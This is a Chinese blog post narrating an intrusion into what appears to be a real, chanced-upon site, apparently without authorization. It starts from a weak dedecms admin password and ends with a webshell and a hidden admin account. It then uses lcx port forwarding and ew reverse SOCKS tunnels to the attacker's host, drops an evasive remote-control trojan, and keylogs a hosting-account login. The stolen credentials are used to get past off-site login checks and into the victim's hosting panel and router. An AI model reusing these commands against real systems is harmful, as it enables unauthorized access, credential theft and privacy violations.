从后台弱口令到内网漫游

暗月博客 2019年11月21日23:48:02评论1,318 views字数 3195阅读10分39秒阅读模式
摘要

从后台弱口令到内网漫游
声明:文章涉及到的方法、思路、工具仅供学习和测试用,用于其他用途产生的一切后 果自负,产生的任何责任和本人无关。

从后台弱口令到内网漫游

声明文章涉及到的方法、思路、工具仅供学习和测试用用于其他用途产生的一切后 果自负产生的任何责任和本人无关。

摘要:从一个后台弱口令到内网漫游,再到隐私信息泄露,文章中详细讲解了其中的各种思 路。

0x01 后台弱口令背锅

在复现一个dedecms漏洞的时候,我在网上到处找该版本的源码,无意间搜索到一个网站, 简单测试一下,这个dedecms后台存在弱口令 admin/admin

我想大家都知道dedecms后台如果存在弱口令的话,会导致直接后台上传webshell的,(详 见下面截图)

从后台弱口令到内网漫游

0x02 进行信息收集

拿到webshell以后,我们进一步进行信息收集和测试。 找到dedecms的数据库配置文件,路径为:/data/common.inc.php 得到数据库信息,用户 名:root 密码:xxxx

从后台弱口令到内网漫游

首先输入ipconfig查看本机地址,我们得到一个IP地址192.168.1.102。

从后台弱口令到内网漫游

输入arp -a 得到arp记录里面存在的一些局域网IP

从后台弱口令到内网漫游

输入tasklist 可以得知目标安装了那些防护软件,方便后续绕过或者做免杀。

从后台弱口令到内网漫游

输入tasklist /svc 找到服务对应列 名称为:TermService PID为:4828(记住这个 pid) 程序名称为:svchost.exe

从后台弱口令到内网漫游

输入netstat -ano 找到pid为:4828的行,从截图可以看到,远程端口为默认的3389。

从后台弱口令到内网漫游

基本信息收集得差不多了我们整理下。 本机IP192.168.1.102

远程端口3389 数据库信息用户名root 密码xxxx 防护软件

0x03 测试思路

我们得知目标是一个内网的主机,经过直接远程连接外网IP发现连不上,说明对方没有对外 映射3389端口。 解决方法:做端口转发,或者远控马,(远控马不能后台控制,只能远程控制桌面,容易被 发现)

0x04 提权进一步测试

首先进行提权

net user 用户名 密码 /add (新建一个账号)

net localgroup administrators 用户名 /add(把用户名加入到管理员组,提升为管理员)

提权完成后,上传端口转发工具,并在webshell下执行命令完成端口转发。

lcx端口转发工具的用法

首先在本地执行: lcx.exe -listen 2222 3333

说明:2222为转发端口,3333为本机任意未被占用的端口(监听2222端口,把收到的数据 转发到本机3333端口)

从后台弱口令到内网漫游

这里需要注意下,如果你选择转发到你家里的电脑上的话,需要在路由器做端口映射(过程 请自行百度) 如果是转发的服务器上的话,需要注意防火墙不要拦截3333和2222端口。

然后在目标上面执行lcx.exe -slave 120.120.120.120 2222 127.0.0.1 3389 说明:把本机的3389端口转发到120.120.120.120 端口为2222的服务器

执行完命令后我们发现本地的监听cmd里面出现连接成功。

从后台弱口令到内网漫游

现在本机打开mstsc IP地址输入127.0.0.1:3333

从后台弱口令到内网漫游

回车后输入提权的账号密码,即可通过反弹的端口,在本地直接登录到目标服务器上。

从后台弱口令到内网漫游

0x05 内网的信息收集

我们通过webshell上传端口扫描工具ScanPort.exe到目标服务器上。 然后在你的mstsc窗口里面找到刚刚上传的工具,设置好端口号和IP段进行扫描。 扫描常见的端口号:21,23,80,139,1433,1723,3306,3389,8080

扫描后我们得知192.168.1.105主机开放了3306端口

从后台弱口令到内网漫游

3306是mysql的端口,说明192.168.1.105这个IP安装了mysql,通过简单测试发现安装的是 phpstudy,只对内网开放,应该是个测试用的环境。 直接输入这个IP后面加上/phpmyadmin 进行尝试登陆,最后发现密码和前面收集到的密码 是一样的。

登录成功以后通过日志写入shell拿到webshell(方法见ICQ里面的汇总 贴:https://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=20754

因为这台测试环境的服务器外网访问不了,不得不上传菜刀到192.168.1.102上进行操作。

拿到shell以后先翻翻文件夹,我一般先看桌面,再看其他分区。 桌面的路径为:C:/Users/Administrator/Desktop/

因为目标处于内网,所以为了方便后续测试我们丢个免杀的远控马到192.168.1.105这个主 机上,在webshel下直接运行即可上线。

在桌面发现几个TXT文件,里面有各种服务器配置信息,ftp信息等等。(数据未动) 其他分区有游戏和其他各种软件,所以判断这是一台个人电脑。

从后台弱口令到内网漫游

等了没多久,在键盘记录下监控到一段有意思的记录,从图中可以看到他应该在登录西部数 据账号。(上面可以购买主机,服务器等等)

从后台弱口令到内网漫游

我本地测试登录一下,的确可以登陆,但是因为异地登录的原因,被二次验证拦截了,登录 不上。

从后台弱口令到内网漫游

但是遇到这么骚的我,你以为真的就没法登录了? NO NO NO

0x06 骚姿势绕过异地登录拦截

思路:因为大多数网站的异地登录是通过IP地址判断的,所以我打算用ew代理工具反弹代理 出来,这样我在本机用sock5工具就能直接通过他的外网IP登录了。

前面我提过,他局域网有192.168.1.102 (对外开放的服务器)192.168.1.105(个人电 脑) 由于个人电脑192.168.1.105安装了360全家桶,ew代理软件会被杀掉,所以我选择

192.168.1.102来运行ew,并且反弹代理出来。

用法: 首先在本地执行以下命令(注意:如果你在局域网下要先在路由器里映射端口,或者开启 dmz。)

ew.exe -s rcsocks -l 1008 -e 888

说明:利用ew.exe监听888端口,把接收到的数据转发到本地1008端口。

从后台弱口令到内网漫游

在目标webshell下执行以下命令

ew.exe -s rssocks -d 2.2.2.2 -e 888

说明:2.2.2.2为你的外网IP,或者填你服务器IP。888是你的端口号(注意防火墙要放 行)

现在去下载一个SocksCap64代理工具,我用的是3.8的版本。 打开后点击菜单栏的【代理按钮】,然后在代理管理器中添加一个代理,ip输入127.0.0.1 端口输入1008 输入完毕后点击下面的【打钩】图标,进行测试是否连接成功。(详见下面截图)

从后台弱口令到内网漫游

然后回到SocksCap64主界面,在里面打开浏览器(注意,第一次打开会提示让你导入本机安 装的浏览器)

打开后输入ip.cn查询你IP是否改变了,如果改变了说明成功。

现在清空浏览器的所有缓存(因为我刚刚登录过西部数据,可能有一些缓存或者cookie记 录) 重新登录西部数据发现已经绕过异地验证。

吓屎宝宝了,这应该是个建站公司的,要不然不可能这么多虚拟主机和域名吧?

从后台弱口令到内网漫游

登录后发现虚拟主机都可以在这里进行管理,包括虚拟主机的ftp在这里也能看到。

从后台弱口令到内网漫游

通过西部数据的密码我尝试登陆了他路由器,登陆成功(大多数人都有这个习惯,各种密码 一样)

从后台弱口令到内网漫游

以上这种反弹方法针对对方服务器处于内网或者对方服务器对外开放端口但是本身某些端口被屏蔽

都可以使用反弹代理来实现绕过然后直接进入对方内网,当然也可以用来做跳板具体看个人发挥了。

吃水不忘挖井人附上链接http://m.bobao.360.cn/learning/detail/3502.html

测试到此结束了所有数据未动只是为了验证真实性。 发布文章之前已通知对方修改密码服务器安装防护软件等等。

0x07 总结

一、尽量不要大多数的密码设置成一样的。 二、尽量设置复杂的密码(包含大小写数字加特殊字符 10位数以上) 三、不要认为在局域网里面就是安全的。

SocksCap64可百度搜索【SocksCap64下载】

Earthworm下载

http://rootkiter.com/EarthWorm/

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
暗月博客
  • 本文由 发表于 2019年11月21日23:48:02
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   从后台弱口令到内网漫游https://cn-sec.com/archives/73851.html

发表评论

匿名网友 填写信息